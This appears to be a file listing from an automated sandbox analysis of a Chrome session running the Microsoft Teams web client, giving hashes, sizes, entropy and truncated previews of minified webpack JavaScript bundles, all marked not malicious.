                                                                                                                                                                                                                                                                            Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[876152],{876152:e=>{e.exports=[{types:{ModelDirectiveScope:[5,["SERVER_RESOLVERS","BROWSER_RESOLVERS","CLIENT_RESOLVERS"]],DisplayWaterMark:[5,["On","Off","Fade"]],CommunityNotificationSettings:[2,{id:10,inviteOnNetworkEmailOptIn:2,announcementEmailOptIn:2}],HardwareOutDevice:[2,{id:10,description:6,isAvailable:7,callId:5,participantId:5,localStream:2,participantStreamId:3,videoType:"StreamType",format:1,formats:11,participantDisplayName:1}],PtzControlCommand:[5,["Reset","ZoomIn","ZoomOut","PanLeft","PanRight","TiltUp","TiltDown"]],TranscriptEditType:[5,["Speaker"]],TranscriptDownloadFormat:[5,["Vtt","Docx","Pdf"]],DriveRecipientInput:[6,{email:1,alias:1,objectId:1}],LinkScopeInput:[5,["anonymous","organization","users","existingAccess"]],LinkTypeInput:[5,["view","edit"]],CreateShareLinkOptions:[6,{deferRedeemEnabled:7,partialSuccessEnabled:7}],PptSharingContentInput:[6,{id:10,name:6,type
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (4149)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):4257
                                                                                                                                                                                                                                                                            Entropy (8bit):4.471812584842707
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:96:hydDBZSb/w5jO7Pnwn6irx69i9O67QynsMqXrKz+cQA+A6I:hydlZSb77PSd6YO6MMsMC+n7+Ah
                                                                                                                                                                                                                                                                            MD5:1BE4CDDC6D571645E8EE9A751FAF7EB1
                                                                                                                                                                                                                                                                            SHA1:02E2FFF3FBD785F74089C9CB1D380A15335734D4
                                                                                                                                                                                                                                                                            SHA-256:7EE97714B3FF1AE9124B8737D04D448D2FDB697BF332F5B2D22593D5916EF217
                                                                                                                                                                                                                                                                            SHA-512:2F56DF1A4C068808C904E1DDAEF311E625420B46593E8221FFD404F4D290A4BF791A291BD957A08352FF7665CFD569F44417D17231122588BCF83C338DCB654E
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[118046],{727467:(C,s,e)=>{e.d(s,{f:()=>c});var a=e(957032);const c=(0,e(485529).Ke)({svg:({classes:C})=>(0,a.Y)("svg",{viewBox:"2 2 16 16",role:"presentation",className:C.svg,children:(0,a.Y)("path",{d:"M4.08859 4.21569L4.14645 4.14645C4.32001 3.97288 4.58944 3.9536 4.78431 4.08859L4.85355 4.14645L10 9.293L15.1464 4.14645C15.32 3.97288 15.5894 3.9536 15.7843 4.08859L15.8536 4.14645C16.0271 4.32001 16.0464 4.58944 15.9114 4.78431L15.8536 4.85355L10.707 10L15.8536 15.1464C16.0271 15.32 16.0464 15.5894 15.9114 15.7843L15.8536 15.8536C15.68 16.0271 15.4106 16.0464 15.2157 15.9114L15.1464 15.8536L10 10.707L4.85355 15.8536C4.67999 16.0271 4.41056 16.0464 4.21569 15.9114L4.14645 15.8536C3.97288 15.68 3.9536 15.4106 4.08859 15.2157L4.14645 15.1464L9.293 10L4.14645 4.85355C3.97288 4.67999 3.9536 4.41056 4.08859 4.21569L4.14645 4.14645L4.08859 4.21569Z"})}),displayName:"PeoplePickerDis
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (551)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):666
                                                                                                                                                                                                                                                                            Entropy (8bit):5.4222694182392575
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:12:/4p3sp38cFziZm5P5immRXBF5Dd2Fse+mMcQZghsDzrhV2zLWEZJg59E2HiS6Mm:wp3sp38cxsGxSF1Dd2Fse+mMcQTrD+CO
                                                                                                                                                                                                                                                                            MD5:1B6F6EA06F39E90E233B1633C91D9077
                                                                                                                                                                                                                                                                            SHA1:A218DF4B47D55625E01DB46BDD1F2E19F5256889
                                                                                                                                                                                                                                                                            SHA-256:A4558EE44DEAA7519AAB650EC7455BA8975030196CCD1663B2826E0FD602FFD4
                                                                                                                                                                                                                                                                            SHA-512:DF591C4BCBD03B1D8F790AD9C1003076A668A5F5DA86F85194DC58960963B8E34F8C41BC67FDD63D65E72AAE33A2A16754264760F5BA78B7A6FFC1244F09950B
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[790222],{6751:(e,t,a)=>{a.r(t),a.d(t,{typeDefs:()=>r,resolvers:()=>s.u});var r=a(876152),s=a(701426)},701426:(e,t,a)=>{a.d(t,{u:()=>n});var r=a(425104),s=a(699899);const n={BigInt:s.BM,DateTime:s.Ps,JSONData:s.kJ,ScalarEnumString:new r.Ag({name:"ScalarEnumString",description:"ScalarEnumString custom scalar type used for object that can use toString",parseValue:e=>e.toString(),serialize:e=>e.toString(),parseLiteral:e=>e&&e.value})}}}]);.//# sourceMappingURL=https://local.teams.office.com/sourcemaps/hashed-assets/r_data-schema-de88db18bfc98298.js.map
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (20998)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):21106
                                                                                                                                                                                                                                                                            Entropy (8bit):5.452653021186707
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:384:+r9hEq1pKg0dQZ7dOz2DhXQlB897+p3vbBowdFd5zzyarBsFjNEFq8ve376BJxk/:+xiQpKy7Iz2SlB8cBKNEFg76SdcxrspN
                                                                                                                                                                                                                                                                            MD5:8582AC89D3364B0452D251B425FD485D
                                                                                                                                                                                                                                                                            SHA1:0CDB6C6B7D862E01C83C2F90CFD665A5A4CC8FAE
                                                                                                                                                                                                                                                                            SHA-256:DBD443E51C0082680B8DBB04C908596E11E27E8FB3A366CC4094F9EB40FE7990
                                                                                                                                                                                                                                                                            SHA-512:BA030EF2B0A5323B1EC4B2889F70163906504B478BB020FCE8AA877FEDD44C9483824EDB6D027A827A6CF4466818EB112831D767F13A8FA2D53CDEAFC21123F9
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[797193],{911777:(e,t,n)=>{n.d(t,{Z2:()=>a,Ov:()=>o,rc:()=>i});var a,s=n(364819);!function(e){e.GlobalApp="GlobalApp",e.TenantApp="TenantApp",e.CustomApp="CustomApp"}(a||(a={}));const o=e=>e?i(e.externalId,e.tenantId):null,i=(e,t)=>(0,s.isEmpty)(e)?a.GlobalApp:(0,s.isEmpty)(t)?a.CustomApp:a.TenantApp},235291:(e,t,n)=>{n.d(t,{tj:()=>x,B6:()=>A,eJ:()=>g,is:()=>b,xB:()=>L,MW:()=>F,w3:()=>C,T4:()=>T,eC:()=>y,K:()=>S,L$:()=>w});var a=n(364819),s=n(812228),o=n(362328),i=n(70887);const r={kind:"Document",get definitions(){const e=(0,o.G)("mutation pinMessageExtensionV2($appId:ID!,$pinOrder:Int!) {pinMessageExtensionV2(appId:$appId,pinOrder:$pinOrder) {...installedAppFields}}");return delete this.definitions,this.definitions=[...e.definitions,...i.B.definitions]}};var c=n(590438);const l={kind:"Document",get definitions(){const e=(0,o.G)("mutation unpinMessageExtensionV2($appId:ID!) {
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (879)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):1001
                                                                                                                                                                                                                                                                            Entropy (8bit):5.101417090131756
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:24:wp3sp38fCaDiRFdhaKWv5iz77RfzSj3TXicEAzELRhc8N:wp3sp3ACzd3WvcxrkbzELN
                                                                                                                                                                                                                                                                            MD5:FD46D921680CA184F472CA46E52795D2
                                                                                                                                                                                                                                                                            SHA1:30A8E5422FDA4A8E8A271ACF1472B942A9DCDC94
                                                                                                                                                                                                                                                                            SHA-256:AA3914B5961F002F6AEF22894193EDBBF0B0CD36F97530F2D4559084AF66C374
                                                                                                                                                                                                                                                                            SHA-512:CFD1469F02B981FFC5BECC85717151C9E8258FA4EE1C05E521817BA2DD2995B052F3B1978208C2CB07BD2132CAC374D1AFB29449C36CC4A5BEC0DF723548512A
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[227307],{467681:(e,a,l)=>{l.r(a),l.d(a,{default:()=>t});const t={namespace:"gallery",locale:"en-us",translations:{gallery_galleryEmptyStateMessage:"Photos added to chat automatically show up here.",gallery_galleryEmptyStateMessageCommunities:"Photos added to community automatically show up here.",gallery_galleryLoadingMessage:"Loading Photos...",gallery_gallery_grid_images:"Images from",gallery_gallery_grid_label:"Image gallery",gallery_imageGroupLastMonth:"Last Month",gallery_imageGroupMonth:"Earlier This Month",gallery_imageGroupToday:"Today",gallery_imageGroupWeek:"Earlier This Week",gallery_imageGroupYesterday:"Yesterday",gallery_imageLabel:"Image",gallery_image_menu_viewInChat:"View in Chat",gallery_image_menu_viewInCommunity:"View in Community"}}}}]);.//# sourceMappingURL=https://local.teams.office.com/sourcemaps/hashed-assets/gallery-locale-en-us-83a3d27de297752a.js.ma
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (29731)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):29839
                                                                                                                                                                                                                                                                            Entropy (8bit):5.480286659693982
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:lgcQt/jMPwaQOaPC8Hs/lsCyKhoXH+qbdGerTRs5FPCnjKcKzRyDK7hbX00SH6PK:lgHf//BCKhGTA/t
                                                                                                                                                                                                                                                                            MD5:A7D47B96F7C26B98109550B98CF55B6E
                                                                                                                                                                                                                                                                            SHA1:FF4101EFBC90EBE5C37FA6091A40F4E753D892AB
                                                                                                                                                                                                                                                                            SHA-256:FF20B9DA1DBDF4B95C1F06CE5AF06075DF5701B6649D970A7C27AED8B902E45F
                                                                                                                                                                                                                                                                            SHA-512:D177390748499D6E321085F9F10FCFD524FF13940F31BA4D38011CB2B2C6F025EBC2CE6DCCAB2060AF2C5E1C083B7C90FEDE8FEF7C4635C465F506E441A0B418
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[932549,769268,657634],{998783:(e,t,n)=>{n.d(t,{S:()=>F});var r=n(513432),o=n(733071),a=n(589256),i=n(531389),l=n(411947),s=n(164093),c=n(602835),u=n(478304),d=n(716300),f=n(750818),v=n(119068),p=n(499319),m=n(483851),g=n(762612);var b=n(644525),h=n(854130);var y=n(103735),B=n(965804),w=n(526521);const k="fui-Checkbox",q="fui-Checkbox__label",j="fui-Checkbox__input",z="fui-Checkbox__indicator",x=(0,y.D)("r1q22k1j","r18ze4k2"),D=(0,B.O)({unchecked:{Bi91k9c:"f3p8bqa",pv5h1i:"fium13f",lj723h:"f1r2dosr",Hnthvo:"f1729es6"},checked:{sj55zd:"f19n0e5",wkncrt:"f35ds98",zxk7z7:"f12mnkne",Hmsnfy:"fei9a8h",e6czan:"fix56y3",pv5h1i:"f1bcv2js",qbydtz:"f7dr4go",Hnthvo:"f1r5cpua"},mixed:{sj55zd:"f19n0e5",Hmsnfy:"f1l27tf0",zxk7z7:"fcilktj",pv5h1i:"f1lphd54",Bunfa6h:"f1obkvq7",Hnthvo:"f2gmbuh",B15ykmv:"f1oy4fa1"},disabled:{Bceei9c:"f158kwzp",sj55zd:"f1s2aq7o",Hmsnfy:"f1w7mfl5",zxk7z7:"fcoafq6",B
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (6442)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):6549
                                                                                                                                                                                                                                                                            Entropy (8bit):4.423584442346006
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:96:jF1VzTfHkA59oiGjJRVvOiPtwiPKnGYeAy7bgIriKVFJymxjr92u4uTg7VS2uak5:Z1BHJGVRVQWbgeVnk76TTFCbkV
                                                                                                                                                                                                                                                                            MD5:56C5065DEA54846EEE66810FDD4B1760
                                                                                                                                                                                                                                                                            SHA1:A711A000A77A3FFB841AD985A6B8308D6E1A8BA9
                                                                                                                                                                                                                                                                            SHA-256:69AB6B37B3B69767632FAF30A02E6DF49BFD8A42013A3293F5CFB019FFE02F3B
                                                                                                                                                                                                                                                                            SHA-512:9DDA25938BFBCAEA7DBAC2213147235957195CF94C69BB69B3C79FBA1EE79DE2F50731C2CC4B39A7812B49D8ECC3A8E5D345C765292F63D8064E868EACC47C09
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[40790],{40790:(a,h,v)=>{v.d(h,{cOw:()=>l,S95:()=>e,IY4:()=>m,MiG:()=>c,CGe:()=>M,e_3:()=>H,svh:()=>V,lTA:()=>A,Vbj:()=>t,zn0:()=>C,nwp:()=>i,GH9:()=>o,kMD:()=>n,TTy:()=>r});var Z=v(693935);const l=(0,Z.U)("Clover20Filled","20",["M5.5 2a3.5 3.5 0 1 0 0 7h3a.5.5 0 0 0 .5-.5v-3A3.5 3.5 0 0 0 5.5 2Zm0 15a3.5 3.5 0 1 1 0-7h3c.28 0 .5.22.5.5v3A3.5 3.5 0 0 1 5.5 17Zm8-15a3.5 3.5 0 1 1 0 7h-3a.5.5 0 0 1-.5-.5v-3A3.5 3.5 0 0 1 13.5 2Zm0 15a3.5 3.5 0 1 0 0-7h-3a.5.5 0 0 0-.5.5v3a3.5 3.5 0 0 0 3.5 3.5Z"]),e=(0,Z.U)("Clover20Regular","20",["M5.5 2a3.5 3.5 0 1 0 0 7h3a.5.5 0 0 0 .5-.5v-3A3.5 3.5 0 0 0 5.5 2ZM3 5.5a2.5 2.5 0 0 1 5 0V8H5.5A2.5 2.5 0 0 1 3 5.5ZM5.5 17a3.5 3.5 0 1 1 0-7h3c.28 0 .5.22.5.5v3A3.5 3.5 0 0 1 5.5 17ZM3 13.5a2.5 2.5 0 0 0 5 0V11H5.5A2.5 2.5 0 0 0 3 13.5Zm14-8a3.5 3.5 0 1 0-7 0v3c0 .28.22.5.5.5h3A3.5 3.5 0 0 0 17 5.5ZM13.5 3a2.5 2.5 0 0 1 0 5H11V5.5A2.5 2.5 0 0 1 13.
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (23673)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):23780
                                                                                                                                                                                                                                                                            Entropy (8bit):5.286961123123951
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:384:d8gaa9LSV5yrS0SWSCSYSLSy6/OU/poVLvtmK6bzrCzfLxpBsxp107IZtX:WgaAuV5fJljWy+poVL1mK6bzWzf+107W
                                                                                                                                                                                                                                                                            MD5:8A4AC929051220C24FB5440F9916FEF2
                                                                                                                                                                                                                                                                            SHA1:52C6A6A2FDDCFB2794638ACA38391BDEF6F16EC0
                                                                                                                                                                                                                                                                            SHA-256:93D967482971DBCF399FD11DCE12FA4BF037DF1608C5696DA852AF8C8C7AB521
                                                                                                                                                                                                                                                                            SHA-512:2FF97ACC1CFF1964901F3BDA62D2AD95E8CE202BED098CA30196EE1EF75547CB9672FF505A4047F1F2CED18C90AE47191F560FC46F53824A24B98F27CE7BE43F
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/34655-8b85948394fbbcc5.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[34655],{34655:(e,t,r)=>{r.d(t,{TL:()=>a,XY:()=>n,f2:()=>s,O4:()=>d,LD:()=>l,sj:()=>c,Ir:()=>C,lQ:()=>T,J2:()=>u,dy:()=>E,c1:()=>S,Kw:()=>I,N2:()=>m,Vx:()=>p,Xn:()=>A,Xk:()=>v,qj:()=>R,ak:()=>D,mA:()=>g,JN:()=>k,ow:()=>L,Tl:()=>F,XK:()=>U,Mh:()=>P});var a,i,n,o=r(724801);!function(e){e[e.Presenting=0]="Presenting",e[e.InCall=1]="InCall",e[e.InBroadcast=2]="InBroadcast",e[e.Interactive=3]="Interactive",e[e.Inactive=4]="Inactive",e[e.LongInactive=5]="LongInactive",e[e.Disabled=6]="Disabled",e[e.Disconnected=7]="Disconnected",e[e.Offline=8]="Offline",e[e.Uninitialized=9]="Uninitialized"}(a||(a={})),function(e){e.AppLogout="appLogout"}(i||(i={})),function(e){e[e.error=0]="error",e[e.warn=1]="warn",e[e.info=2]="info",e[e.verbose=3]="verbose"}(n||(n={}));const s={second:1e3,minute:6e4,tenMinutes:6e5};var d,l,c,C;!function(e){e.Deserialization="Deserialization",e.Unknown="Unknown",e.
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (3971)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):4079
                                                                                                                                                                                                                                                                            Entropy (8bit):5.303593149178301
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:96:AKyq75bqlUMjMzjy6YRQE5qQEPJbP2pGO63:ZVbIYH9QEPJbP2oR3
                                                                                                                                                                                                                                                                            MD5:FF7BA3DED0CB6CDE2FDD7CC73AD36CC7
                                                                                                                                                                                                                                                                            SHA1:7329F5FD2EF53DEC8220DB9CA69C7A058E8B4386
                                                                                                                                                                                                                                                                            SHA-256:5B6C65EE1CC693700CF933136ED47345604718427FFAD38D638166DA4217E964
                                                                                                                                                                                                                                                                            SHA-512:482AE7DF2909AE55250DB8EEAAA95B7FA92968802AF6C972C910BED2830B958813CBB263E73EDA6CC4AB27C3236D4BED8ECF8C4CA94F01FF0F8CCA0D36749A65
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[981746],{987867:(e,n)=>{function t(e,n){var t=e.length;e.push(n);e:for(;0<t;){var a=t-1>>>1,r=e[a];if(!(0<i(r,n)))break e;e[a]=n,e[t]=r,t=a}}function a(e){return 0===e.length?null:e[0]}function r(e){if(0===e.length)return null;var n=e[0],t=e.pop();if(t!==n){e[0]=t;e:for(var a=0,r=e.length,l=r>>>1;a<l;){var u=2*(a+1)-1,o=e[u],s=u+1,c=e[s];if(0>i(o,t))s<r&&0>i(c,o)?(e[a]=c,e[s]=t,a=s):(e[a]=o,e[u]=t,a=u);else{if(!(s<r&&0>i(c,t)))break e;e[a]=c,e[s]=t,a=s}}}return n}function i(e,n){var t=e.sortIndex-n.sortIndex;return 0!==t?t:e.id-n.id}if("object"==typeof performance&&"function"==typeof performance.now){var l=performance;n.unstable_now=function(){return l.now()}}else{var u=Date,o=u.now();n.unstable_now=function(){return u.now()-o}}var s=[],c=[],f=1,b=null,p=3,d=!1,v=!1,y=!1,_="function"==typeof setTimeout?setTimeout:null,m="function"==typeof clearTimeout?clearTimeout:null,h="und
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (2208)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):2316
                                                                                                                                                                                                                                                                            Entropy (8bit):4.861015852238033
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:48:wp3sp3xv08PIo+iBj54nWJy5PIm7HjnhSJyVR0K5m:IqQiYWY+qHjhSYVR9Q
                                                                                                                                                                                                                                                                            MD5:8A95CDB621AC696E7DC73F945C5E028D
                                                                                                                                                                                                                                                                            SHA1:912AD9D60D0D78C8CBAFD355014EBBE714A162EE
                                                                                                                                                                                                                                                                            SHA-256:6A8270DB58C60E1C6B94EF0CF99FB2693EE00D6AA5FDC1D7CF3B5224935F3F9B
                                                                                                                                                                                                                                                                            SHA-512:FF88C3A0C969660D74F810B8E0CF56CA9780DD696ACDF86E007A4846763F02FAACFFE6447631F7F45612B2F106F82EC48E6E4A5521DB8266645A37679BB9F711
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[169767],{169767:(e,C,t)=>{t.d(C,{d:()=>r});var a=t(513432),s=t(395225),l=t.n(s),c=t(485529),n=t(829289),r=(0,c.Ke)({svg:function(e){var C=e.classes;return a.createElement("svg",{role:"presentation",focusable:"false",viewBox:"2 2 16 16",className:C.svg},a.createElement("g",{className:l()(n.Q.outline,C.outlinePart)},a.createElement("path",{d:"M9.51562 6C9.23948 6 9.01562 6.22386 9.01562 6.5C9.01562 6.77614 9.23948 7 9.51562 7H12.2929L8.14645 11.1464C7.95118 11.3417 7.95118 11.6583 8.14645 11.8536C8.34171 12.0488 8.65829 12.0488 8.85355 11.8536L13 7.70711V10.4844C13 10.7605 13.2239 10.9844 13.5 10.9844C13.7761 10.9844 14 10.7605 14 10.4844V6.5C14 6.22386 13.7761 6 13.5 6H9.51562ZM12.7656 17C14.0136 17 15.0481 16.0855 15.2354 14.8901C16.2572 14.5761 17 13.6248 17 12.5V5.5C17 4.11929 15.8807 3 14.5 3H7.5C6.36321 3 5.40363 3.75875 5.10007 4.79744C3.90947 4.98887 3 6.02104 3 7.26562
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (33242)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):33350
                                                                                                                                                                                                                                                                            Entropy (8bit):5.456986294670368
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:VvfRbMtKylVbwXH1eRvk/WCwrWrJFWzSwnAMPjrLhz6/ft9S6hchueSsCxkbX9Wm:Vx3j5M1x63t9Sjw1WyWX
                                                                                                                                                                                                                                                                            MD5:64EBEF1DD8782283F077F1B74F2941FF
                                                                                                                                                                                                                                                                            SHA1:77C7F7BC07A2081E5DEA8548B97710C8C680B8D9
                                                                                                                                                                                                                                                                            SHA-256:F0F882EFAA5CAF321ABC707FB40BD4E9FAB3E711D67BAEC99D3DF4EB15E24CD8
                                                                                                                                                                                                                                                                            SHA-512:2DAB868C40E14DDA005E6F3AD4A974594B3908447B7D7D427593164C005B8C11BA22C7D8D5F8AE4666B0ED12A9BDA8D51946C856B1F2B88EAF22C75E36CA271D
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[660886],{305536:(e,t,i)=>{i.d(t,{Z8:()=>n,X0:()=>o,_v:()=>l,lW:()=>d,Gy:()=>c,L7:()=>u,rd:()=>m,HT:()=>p});var n,a=i(355515),r=i(34655),s=i(364819);!function(e){e.Text="text/plain",e.Html="text/html",e.Png="image/png"}(n||(n={}));const o=e=>{const t=e.document.getSelection();if(t){if(t.toString())return!0;if(t.rangeCount>0){if(t.getRangeAt(0).cloneContents().childElementCount>0)return!0}}return!1},l=(e,t,i,a)=>{const r=e.document,o=r.createElement("div");(0,s.assign)(o.style,{color:"transparent",outline:"none",boxShadow:"none",background:"transparent"}),o.setAttribute("aria-hidden","true");const l=r.createElement(t);((e,t)=>{(0,s.assign)(e,t),t&&Object.keys(t).forEach((i=>e.setAttribute(i,t[i])))})(l,i),a&&(0,s.assign)(l.style,a),o.appendChild(l),r.body.appendChild(o);const d=r.getSelection();if(d){d.removeAllRanges();const e=r.createRange();e.selectNode(l),d.addRange(e)}cons
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (52830)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):52938
                                                                                                                                                                                                                                                                            Entropy (8bit):5.41823633886219
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:v92b3BHIzsumAVhQQCWPBoNiiFsKO8etKKyJGTs2tDebpXITb1QlMV61X9W5r6EI:YaToNiiqVsaq14GeEtBive3
                                                                                                                                                                                                                                                                            MD5:0017DD95798953D1D4CC0242811AC190
                                                                                                                                                                                                                                                                            SHA1:618E03782D536621BB50C0B632A29E0A8596115D
                                                                                                                                                                                                                                                                            SHA-256:7468DDE41E6EF1F5D223EE27F7163A1AA44D0459CDB3208AF3C8B6789D672FB5
                                                                                                                                                                                                                                                                            SHA-512:8BED877CE9A91ABBE36A98A92AE1A7FAB03C755A2935A0A9A2BA3D46CB8D4127582C45A25BEC160509B583905D01290B9D51C0B471EA0C2FBDE4C4BD8473E363
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/455485-9eeec0dc31ad317f.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[455485],{568954:(e,t,n)=>{n.d(t,{e:()=>S});var r=n(362328);const s={kind:"Document",get definitions(){const e=(0,r.G)("query twoWaySmsFriendlyName {twoWaySmsFriendlyName @client}");return delete this.definitions,this.definitions=e.definitions}};var i=n(727780),a=n(277362),o=n(364819),l=n(37858),c=n(389423),p=n(181031),u=n(820092),d=n(572608),h=n(780800),m=n(355515),g=n(34655),f=n(967400);const y={kind:"Document",get definitions(){const e=(0,r.G)("query ComponentsPeoplePickerPhonelinkSmsPairingStatusQuery {getPhonelinkSmsPairingStatus}");return delete this.definitions,this.definitions=e.definitions}};var b;class S{}b=S,S.getResultsForTwoWaySMS=(e,t,n,r,s)=>b.getPeoplePickerItem(e.trim(),t,n,r,s).then((e=>e?[e]:[])),S.getPeoplePickerItem=(e,t,n,r,s)=>(0,o.isEmpty)(e)?k("Empty query"):(0,l.B9)(e)?k("Invalid query"):b.getPstnPickerItem(e,t,r,n,s),S.getPstnPickerItem=async(e,t,n,r
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (31689)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):31797
                                                                                                                                                                                                                                                                            Entropy (8bit):5.438772364546282
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:w2UGF9QQNt11j3lAVQAs5IpONtKzrs5vS1AUbK5wlA/2Fk2ClxNHXs5FWd3NNM1:g0jeVlsfurs4w5mO01
                                                                                                                                                                                                                                                                            MD5:6CE8DEFA016A333EB95E27D5D2E63316
                                                                                                                                                                                                                                                                            SHA1:E7ADFB05C75DF1FD13FCC8A34BB86F6E47B4C8BD
                                                                                                                                                                                                                                                                            SHA-256:282D6A88554351A160F7D45592C135445BB21588E62FBCEC24EFAFF4E2ED52B1
                                                                                                                                                                                                                                                                            SHA-512:713F2BF05B0F6AA36638FE6A324041904137C651F630680620AC1C96E4ED90ACA15D0D4AA94BF6615E6A12C4BBC8AE3BBE0DA949501E3C1D7140416707B6EB0A
                                                                                                                                                                                                                                                                            Malicious:false
